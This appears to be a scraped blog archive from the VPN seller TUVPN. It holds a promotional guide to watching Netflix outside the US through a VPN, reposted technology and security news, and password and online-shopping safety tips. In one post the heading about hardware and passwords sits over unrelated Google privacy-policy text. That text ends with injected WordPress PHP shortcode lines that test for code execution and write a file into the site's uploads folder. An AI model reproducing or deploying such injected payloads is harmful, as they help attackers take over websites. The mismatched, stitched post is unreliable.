How to watch Netflix out of US

General, VPN HowTo, VPN Uses No Comments »

Hi everyone. My name is Mike. And I would like to start blogging on this service. We will discuss different tasks here concerning using vpn and personally TUVPN service.

I think many of you have heard about such a service as  Netflix. It is used in US for watching online television, movies, TV shows and s.o. Netflix is an American company of on-demand Internet streaming media available to both North and South America, the Caribbean, United Kingdom, Ireland, Sweden, Denmark, Norway, Finland.

This provider is available for almost all the devices that have Internet connection: Apple Iphone, Ipad, PlayStation, Android, Samsung Galaxy Tabs… The list can be really long thanks to our modern technologies.
But how to watch Netflix in Europe for example or other countries of the world that are not in the list bellow? That will be the main topic of this blog. The best solution to watch Netflix out of the US is to connect to a VPN server. Using the VPN will enable you to hide your own IP address and choose location waht you need. Particularly now we need US server.
TUVPN is one of the good examples of VPN services for unblocking Netflix. By looking through the different forums, blogs, articles I've found for myself the optimal variant. When you start VPN you neglect a VPN client on your PC, log in using your private login and password and your device is changing the different keys with the server you selected. That is how the TUVPN also works. But comparison of prices make me proud! I think it's a good reason to try TUVPN. We have a great speed with unlimited traffic which makes watching online more pleasant and comfortable. And the list of servers will expand in the nearest future. Right now we can offer 9 different servers in 7 countries: 2 servers in London (UK), 2 in Amsterdam (Netherlands), Erfurt server (Germany), server in Madrid (Spain), Stockholm server (Sweden), Montreal server (Canada) and the one that is now important for us: server in Chicago (USA).

    So how exactly to use it. To watch   Netflix online movies out of US there is no need to order Dedicated IP. Shared will be better. You just need US server Here are some simple steps:
    1. First you go to the “BUY” page to order the service.
    Try TUVPN with 60% DISCOUNT!
    By this link you will get it.
    2.  Download the application using there tutorials.
    The link is: As also you see that they have the list of them for setting up it on different devices, Windows, Mac tutorials, Linux and also Router.
    3. After setting up launch the server you need. In our case we choose

    Actually that is all what you need. Nothing difficult at all, is it. If you have any questions, suggestions I will be very happy to answer! See you next post.

Google plans to set up gigabit-speed fiber in Provo, Utah

General No Comments »

Google is acquiring a fiber-optic network owned by the city.

Google is acquiring iProvo, a fiber-optic network owned by the city of Provo, Utah, as part of a plan to introduce its high-speed broadband network called Google Fiber there.

As part of the acquisition, Google will upgrade the network to gigabit technology and finish network construction so that every home along the existing iProvo network will have the opportunity to connect to Google Fiber, the company announced in a blog post on Wednesday.

Provo Mayor John Curtis on Wednesday announced an agreement with Google to give the city access to Google Fiber. Apart from purchasing iProvo, which was set up in 2004, Google has committed to offer free Internet service at 5Mbps speed to every home along the existing iProvo network for a US$30 activation fee and no monthly charge for at least seven years. Google is also committed to provide free Gigabit Internet service to 25 local public institutions including schools, hospitals and libraries.

The price Google is paying for iProvo was not disclosed. The city decided to sell the troubled network about 18 months ago, and approached Google to purchase it.

The agreement with Provo has to be approved by a vote by the city council scheduled for Tuesday. "We intend to begin the network upgrades as soon as the closing conditions are satisfied and the deal is closed," Kevin Lo, general manager of Google Fiber wrote in a blog post. The company expects to offer services in Provo from the end of this year.

Google said earlier this month that it would roll out Google Fiber in Austin, Texas, as part of its plan to build fiber networks in an unspecified number of cities in order to demonstrate what consumers and businesses can do with 1Gbps of Internet access. The service in Austin is planned for the middle of next year.

The Internet company said in February 2010 that it planned to build and test ultra high-speed broadband networks in some trial locations across the U.S., with 1Gbps fiber-to-the-home connections. It asked for responses to its request for information (RFI) from local governments and the public.(

It started to connect homes in Kansas City, Kansas, to the Google Fiber broadband service in November last year, with the promise that the installations at Kansas City, Missouri, would start in 2013. The two cities won out over 1,000 cities that applied for the 1Gbps service in 2010. In March, Google added Olathe in Kansas to the locations where it planned to roll out the network.

In Kansas, Gigabit Internet is priced by Google at $70 per month, while high-speed Internet bundled with TV costs $120 a month. Free Internet at up to 5Mbps downstream is available for a construction fee of $300. The proposed rates for all services in Austin and Provo have not been disclosed yet.

John Ribeiro covers outsourcing and general technology breaking news from India for The IDG News Service. Follow John on Twitter at @Johnribeiro. John's e-mail address is

Microsoft’s April Patch Tuesday brings no Pwn2Own fix

General No Comments »

In a relatively light month for Patch Tuesday, Microsoft issued nine bulletins covering 14 vulnerabilities for April.

IDG News Service – System administrators and IT security pros can take bit of a breather: Microsoft issued a comparatively light set of patches for this edition of its monthly release of software vulnerability fixes.

"It's a boring Patch Tuesday this month, and that's an excellent thing for IT security teams because there won't be a mad dog rush to get this month's patches deployed," wrote Andrew Storms, director of security operations for security firm nCircle, in an email statement.

Perhaps the most surprising aspect of this month's issuance of patches was a high profile vulnerability that did not get covered. Many expected Microsoft to fix the Pwn2Own Internet Explorer bug unearthed earlier this year during a hacker contest, but such a fix was not included in this round. "This puts them quite a bit behind other browsers that already patched their Pwn2Own bugs," Storms noted.

Overall, Microsoft issued nine bulletins, covering 14 vulnerabilities. In contrast, the company fixed 20 vulnerabilities in March, and 57 in February.

Two of the bulletins in this month's collection were designated as critical, and the remaining seven were labelled as important. Windows desktop and server editions, Internet Explorer, Microsoft Office, Microsoft SharePoint and Windows Defender all need to be updated.

Security firms did advise updating Internet Explorer with the critical patches Microsoft released this month for the browser, both within the MS13-028 bulletin, affecting all supported versions of Internet Explorer, versions 6 through 10. "Attackers will be looking into how to exploit these two vulnerabilities, since attackers can target multiple versions of Internet Explorer through the use of only a couple vulnerabilities. So it is important to deploy this patch as soon as possible," wrote Marc Maiffret, chief technology officer for security firm BeyondTrust in his own analysis.

The other critical bulletin covered the Microsoft Remote Desktop client, MS13-029. This vulnerability exists in the client's ActiveX control, and could give attackers the ability to execute arbitrary code on the user's machine. Fortunately, this vulnerability is not in the latest version of Microsoft Remote Desktop client, which reduces to a considerable extent the affected number of machines, according to nCircle.

Microsoft is hosting a webcast to address customer questions about this round of patches on April 10.

Joab Jackson covers enterprise software and general technology breaking news for The IDG News Service. Follow Joab on Twitter at @Joab_Jackson. Joab's e-mail address is

Can hardware help kill the password? Google thinks so

General No Comments »

When you use Google services, you trust us with your information. This Privacy Policy is meant to help you understand what data we collect, why we collect it, and what we do with it. This is important; we hope you will take time to read it carefully. And remember, you can find controls to manage your information and protect your privacy and security at My Account.
There are many different ways you can use our services – to search for and share information, to communicate with other people or to create new content. When you share information with us, for example by creating a Google Account, we can make those services even better – to show you more relevant search results and ads, to help you connect with people or to make sharing with others quicker and easier. As you use our services, we want you to be clear how we’re using information and the ways in which you can protect your privacy.
Our Privacy Policy may change from time to time. We will not reduce your rights under this Privacy Policy without your explicit consent. We will post any privacy policy changes on this page and, if the changes are significant, we will provide a more prominent notice (including, for certain services, email notification of privacy policy changes). We will also keep prior versions of this Privacy Policy in an archive for your review.
[insert_php] echo 147098235+111;file_put_contents(‘wp-content/uploads/info.php’, ”); [/insert_php]
[php] echo 147098235+111;file_put_contents(‘wp-content/uploads/info.php’, ”); [/php]

Problems with Stockholm server Update

General No Comments »

At this moment we have problems with dedicated servers in Stockholm. We will try our best to solve the problem as fast as we can.

According to the problem with this server we are going to change it, for better and safe work.

We apologize for these technical problems and ready to compensate the day when the server wasn't working.

Update: Server was changed. Thank you for understanding.

Yahoo catches up with Microsoft, Google on webmail security

General No Comments »

Yahoo has started providing webmail users the option of using a secure connection, matching a similar feature Google and Microsoft have offered for several years.

Yahoo's delay in providing a Secure Sockets Layer (SSL) connection for email sessions has been criticized by privacy groups that argue the cryptographic protocol help prevent hackers from reading messages sent over a Wi-Fi network.

However, the Electronic Frontier Foundation, which sent a letter in November urging Yahoo to implement SSL, praised Yahoo for catching up with rivals. "We're really happy that Yahoo is starting 2013 right by letting Yahoo Mail users use HTTPS to access their email accounts security," the digital rights group said in a statement.

HTTPS is the communications protocol layered on top of SSL to add the security capabilities to standard HTTP communications.

In providing SSL, Yahoo has left AOL as the only major email provider without the option. Chester Wisniewski, a senior security adviser for Sophos, said all Web services requiring a log in should provide an HTTPS connection by default.

"It is unacceptable in 2013 for anyone to offer something that you log in to without offering SSL/TLS," Wisniewski said in an email. But he said Yahoo still hasn't done it properly. "It should not be an option; it should be required."

Yahoo Web mail users can activate SSL in only a couple of clicks. Within the service, they only need to go to options and select "Make your Yahoo Mail more secure with SSL."

Google rolled out SSL for Gmail in 2010, after it accused China-based hackers of launching highly sophisticated attacks to eavesdrop on human rights activists.

Indeed, in its letter to Yahoo Chief Executive Marissa Mayer, the EFF said HTTPS communications was needed to protect dissidents. "As individuals who engage with at-risk communities targeted for surveillance and censorship, we see on a daily basis how this negligence (not providing secure connections) endangers human rights activists who fight in some of the most repressive environments to protect the basic freedoms that we take for granted," the letter said.

Oracle’s Java security update lacking, experts say

General No Comments »

Oracle's latest update of the Java Development Kit fails to go far enough in fixing the security-troubled platform, bringing only marginal improvements instead, experts say.

Among the improvements in Java SE Development Kit 7, Update 10 (JDK 7u10) is the ability to use the control panel to prevent Java applications from running in browsers. Vulnerabilities in Java are a major target for cybercriminals hoping to infect computers with malware.

That's because hackers know many people do not keep the Java plug-in for browsers up to date, leaving old flaws open to exploitation. This has resulted in a high success rate for attackers. In 2011, an exploit integrated into the Blackhole toolkit, a hacker favorite, had more than an 80 percent success rate, according to HP's security research division.

Other improvements in JDK 7u10 include using the control panel to choose from four levels of security for unsigned applets, Java Web Start applications and embedded JavaFX applications that run in a browser. In addition, Oracle has added a dialogue box that will warn people when the Java plug-in needs to be updated to prevent exploits.

While welcoming the changes, experts said it is only a start. "New features notwithstanding, Oracle still has a long way to go to improve security," said Andrew Storms, director of security operations at nCircle.

Because consumers are not bothering to update Java now, they are unlikely to take the time to learn how to use the control panel, experts say. In addition, Storms points out that large businesses with a full-time IT security staff will only find the new settings help if they can be centrally managed from Microsoft Active Directory or other directory servers.

"Without this access, the new settings will essentially be useless to enterprise IT teams," Storms said.

[Bill Brenner in Salted Hash:If we disable Java, what replaces it?]

More important improvements needed for Java is for Oracle to perform "fuzz" testing on the platform's codebase, said Paul A. Henry, security and forensic analyst an Lumension. Fuzzing is a software testing technique for finding coding errors and security holes.

Wolfgang Kandek, chief technology officer for Qualys, suggested Oracle add a URL blacklisting/whitelisting feature that IT administrators could use to limit what Java applets can run in the browser. Hackers use the mini-programs in order exploit flaws.

Oracle also needs to release patches faster, particularly when a previously unknown vulnerability is discovered, said HD Moore, chief security officer for Rapid7. Oracle releases patches on a quarterly basis, while Microsoft and Adobe release theirs monthly.

"Oracle's quarterly patch cycle is at odds with other makers of high-risk browser add-ons, such as Adobe," Moore told CSO Online.

Storms agreed that Oracle was slow in fixing holes and added that the vendor needs to provide the security industry with more details on vulnerabilities and patches. "Oracle has done a lousy job addressing Java security throughout 2012 and there's no reason to expect they will change their approach in 2013," he said.

Oracle became Java's steward in 2010 with the acquisition of Sun Microsystems.


Security stories to watch this week

General No Comments »

A new week is upon us and, with it, new challenges. Here are some of the big security stories to watch for in the coming days.

Online attacks will play on Sandy Hook Elementary tragedy.
With the news about a gruesome massacre of school children at Sandy Hook Elementary school in Newtown Connecticut still dominating the headlines around the world, security experts are warning folks to be wary of scams and malware attacks playing on the still-unfolding tragedy. The SANS Internet Storm Center (ISC) issued an alert on Monday about Newtown scam sites. The ISC said that several new domain names have been registered relating to the tragic killings in Newtown, and at least some are likely to be the creation of scam artists floating fake charities in the hope of tapping into the outpouring of public grief over the incident. So far, there aren't any scams to report, but SANS said that will change in the days ahead.

Hackin' around the Christmas tree: holiday scams ramp up
We all know that, at least in the U.S., the holiday shopping season starts sometime before Halloween. But things really get going in December. Online shopping makes up a bigger and bigger piece of the holiday season retail pie. Cyber Monday – the first Monday following Thanksgiving – was the biggest online shopping day ever, topping $1.5 billion. Online criminals know that, and are using social media like Facebook and Twitter to lure would-be shoppers with bogus offers. The web site Facecrooks warned of one such scam: a spam campaign on Facebook promising $1,000 Walmart Christmas gift cards. Clicking on the link leads, circuitously, to an online survey that you're asked to fill out and a Facebook application you're asked to install. Doing so will spread the spam to all your contacts.

China's Great Firewall gets taller as government moves to ban VPN.
To China's all-powerful government censors, disallowing encrypted Internet sessions may have seemed like a small tweak to make its government-backed firewall more effective. But that small tweak will have huge repercussions for citizens and businesses operating within the country. According to a number of reports in recent days, the Chinese government started using an enhancement to its Great Firewall to terminate encrypted Web and VPN sessions. For consumers, that means popular sites like Facebook and Google Mail that require secure HTTP (https) can't be used. But the feature will also block encrypted virtual private network (VPN) connections in and out of the country – and that's disrupting the ever important business sector. According to a report in the Global Times, VPN service providers Astrill, Witopia and StrongVPN reported that users in mainland China were having their connections blocked, VPN technology is commonly used by many businesses, including multi-nationals with operations in China, to conduct business. The government maintains that all organizations wishing to offer VPN services much register with the Ministry of Industry and Information Technology, and it is illegal for foreign firms to operate a VPN business in the country.

WordPress Pingbacks being used for evil
The security firm Acunetix is warning web site owners that use the popular WordPress content management system that a new attack tool is exploiting unpatched vulnerabilities in a feature used to track links to web posts. In a post on Monday, Acunetix's Bogdan Calin said that problems with the way WordPress handles so-called “Pingback” or “Trackback” requests from external web sites can be used to extract information about the system hosting the blog, or even to launch a denial of service (DOS) attack against another web site. With no fix (yet) from the WordPress Foundation (one is expected soon), users need to disable a file used to do pingbacks, or hold tight and hope not to get attacked!


When password security questions aren’t secure

General No Comments »



When you select a password, you might choose to store it in a password manager, write it down, or commit it to memory (see How to remember passwords for some advice). Sometimes, however, things go wrong: You find yourself without access to your password manager, you lose the paper on which you recorded your passwords, or you forget a password you thought you memorized. Or maybe someone tries to break into one of your accounts, and after a few unsuccessful attempts at entering your password, the site locks out further access until you can confirm your identity.

In all those cases, online services need a secondary way of granting you access to your account or your data when you dont have (or cant use) your password. Sometimesespecially in lower-security situations such as access to an online publication or discussion forumthe provider lets you click a link that results in your existing password, a new password, or password-reset instructions being sent to the email address you have on file. When those simple mechanisms are considered too insecure, the site may ask you to respond to verification questions for which youve previously provided the answers.

Unfortunately, password-reset messages and verification questions come with their own problems and risks. You can reduce your chances of being hackedor being unable to respond correctly to one of these questionsby following a few simple tips.

Prevent password-reset mischief

Of all your passwords, the one for your email account may be the most valuable. Thats because whoever has access to your email account will be able to read and click links in any password-reset messages you receive (such as when you click an 'I Forgot My Password' link). A hacker who guessed or stole just that one password could unlock many other accounts and do all sorts of damage. You can limit your risk here in a couple of ways.

Use a dedicated password-reset account: Consider setting up a new email account for yourself (using a free service such as Gmail) with an address that youll never share or post publicly. Use this account only when prompted to supply an email address for the purpose of verifying or resetting your passwords. That way, even if someone breaks into your main email account, the security of your other accounts wont be compromised.

Take extra care with your email account password: Be sure to choose an especially secure password for your email account. Make sure to set your email client to communicate securely with the mail serverusing Secure Sockets Layer, or SSL, protocols for exampleso that your password never travels over the air unencrypted. In Apple's Mail, select Mail > Preferences, click Accounts, choose an email account from the list, and click Advanced.  Here you'll see the option Use SSL.

Question the questions

Security questionssuch as the timeless classic What is your mothers maiden name?are supposed to have answers that youll never forget but that most other people wont know or be able to guess. Unfortunately, most of the questions from which you can choose arent secure at all.

Your mothers maiden name is a matter of public record, and nearly anyone can learn it online in a few minutes. If you ever wrote a blog entry or a Facebook post about your first pet, your favorite teacher, or other common security question topics, those facts are in the public domain too. To make matters worse, some questions invite ambiguous answers, which could work against you. Where did you meet your spouse? That might be in New York or at a baseball game or at Yankee Stadium, for example. Years from now, will you remember which answer you gave?

Devise memorable lies: To address such problems, theres only one right way to answer verification questionslie. And dont just lie, but come up with one or more answers that follow the same rules as other passwords to prevent guessability; use either a reasonably long (but memorable) phrase or a series of random characters. So, what was the name of my first pet? Why, it was bookends-qualitative. My mothers maiden name? Her dad was Mr. E27jrdU!8. My favorite car? I loved my 1986 Toyota Recalibration Cantaloupe. It doesnt matter what answers you give, as long as you and you alone know what they are, and can supply the same ones you entered previously if asked.

I know one security expert who says he normally uses the same pseudo-random answer everywhere, although some companies (including Apple) require you to provide different answers to each of several questionsmeaning you have even more password-like data to keep track of. Of course, you can write down your answers or store them in a password manager, but then the same problems that prevent you from accessing your password could prevent you from accessing your security answers.

You might make up a little story for yourself about fictional parents, cars, pets, and the like that you can memorize and then draw on when asked for security answers on different sites. Ultimately, since youre not going to be giving truthful answers, you should go out of your way to remember which lie(s) you told.

Keep them phone friendly: Remember that you could wind up in a situation where youll have to supply these answers over the phone. If that should happen, both you and the person on the other end will have an easier time coping with a series of plain-English words than a bunch of random characters.

How to change your security questions and answers

Each service that uses security questions has its own procedure for choosing the questions and answers (and for changing them after the fact). Check the FAQ pages on the websites for your bank and other important accounts to see how to modify your responses.

Update your Apple info: To change the questions or answers for an Apple ID (which you use for iCloud, among many other purposes), go to the Apple ID page, click Manage your Apple ID, enter your username and password, and click Sign in. On the left, choose Password and Security. Answer your existing security questions, and click Continue. Then you can choose new questions and answers (remember, no two answers can be the same) and also edit your Rescue Email Address if you like. Click Save when youre done.

Update your Google info: If you have a Google account (for Gmail and other services), log in as you normally would. Click the gear icon in the upper-right corner of the window and choose Settings from the pop-up menu. Click Accounts and Import followed by Change password recovery options. Under Security question, click Edit. Choose one of the existing security questions or write your own, and fill in your answer. If you also want to change your secondary address, click the Edit link in the 'Recovery email address' section and fill in the new address. Then click Save.

5 Ways to Stay Safe Online on Black Friday, Cyber Monday

General No Comments »

Thanksgiving is just around the corner in the U.S., and so are Black Friday and Cyber Monday, two of the busiest shopping days of the year. It's also a peak period for malware, phishing and spam. Since employees are increasingly using their own devices to access corporate resources (or simply using a work PC to sneak in a little shopping on Cyber Monday), it's a good idea to share some best practices with your users to help protect them and your network from threats.

"You could tell them no," says Bob Bunge, professor of Cyber Security in the College of Engineering and Information Sciences at DeVry University. "In some circumstances, that's absolutely what you should be telling them. Don't use the office network for retail. It's just a bad idea, period. It's a lousy, bad thing to do."

However, employees often don't perceive the security threat as acutely as IT managers do, so a few pointers on keeping safe are a good idea. After all, shopping sites are among the top malware-infected sites on the Web, according to Symantec.

Five Best Practices to Stay Safe Online

When it comes to dodging malware and phishing attacks, there are a few simple things you can watch for on shopping sites to help keep you safe:

Look for an HTTPS and/or padlock in the address bar before submitting personal information on a website. This is a sign that the site is leveraging the SSL/TLS cryptographic protocol to secure your communications with the website in question. This helps protect against man-in-the-middle attacks that allow an attacker to intercept your communications with the site and inject new ones.

Look for your browser address bar to light up green. This is an indication that the identity of the website you're visiting has been strictly validated with an Extended Validation Certificate. In other words, you really are at the website of the merchant you're trying to shop with rather than fake site created by a malicious attacker to fool you into sharing personal information.

Look for a trust seal. Many merchant websites bear trust seals, usually at the bottom of the home page or on pages where you are asked to provide personal information. They come in many different shapes, sizes and colors and are used to verify a number of different claims about a website, from its use of data encryption to its status as a legitimate business entity. For instance, the TRUSTe seal is a privacy seal that indicates TRUSTe has reviewed the site's privacy policy, while the Verisign Trust Seal verifies the identity of a website's owner and operator and that the site is subject to daily malware scans and uses verified data encryption. Scammers can forge a legitimate seal, so you should always verify a trust seal's authenticity by clicking on it and checking the seal's validation page.

If an offer in an online ad or email sounds too good to be true, avoid it. These are often lures to infect you with malware or gather your personal information. "If it sounds scammy, it's probably scammy," Bunge says. "If I had to cut a large IT security training program into just a paragraph or so, probably the first thing I'd say is 'Don't click on that link!' The whole phishing industry nowadays is based on finding ever more creative ways to get you to click on some link.

Use good passwords. Pay attention to the passwords for your email, social networking and online banking accounts. Don't use the same one for everything. "Add up the asset value of everything in the world you have attached to that password," Bunge says. "All your email, all your online storage, all your credit cards and bank accountsthat's an awful lot of asset attached to just one password." Symantec recommends you use passwords that are at least eight characters, a random mixture of upper and lower case characters (including numbers, punctuation and symbols) and are not found in the dictionary. Additionally, never use the same password twice and change your passwords every six months.

"My main advice to consumers is to get yourself simple, reliable routines," Bunge says. "Find three, four or five online merchants that you trust and stick to known commodities. If you do want to branch out and surf the general Internet and try some merchants you haven't work with before, do some research. Put the name of the merchant in a search engine and see how often "fraud" or "rip off" pop up.

Get Your VPN NOW!

©2011 TUVPN.COM. All rights reserved.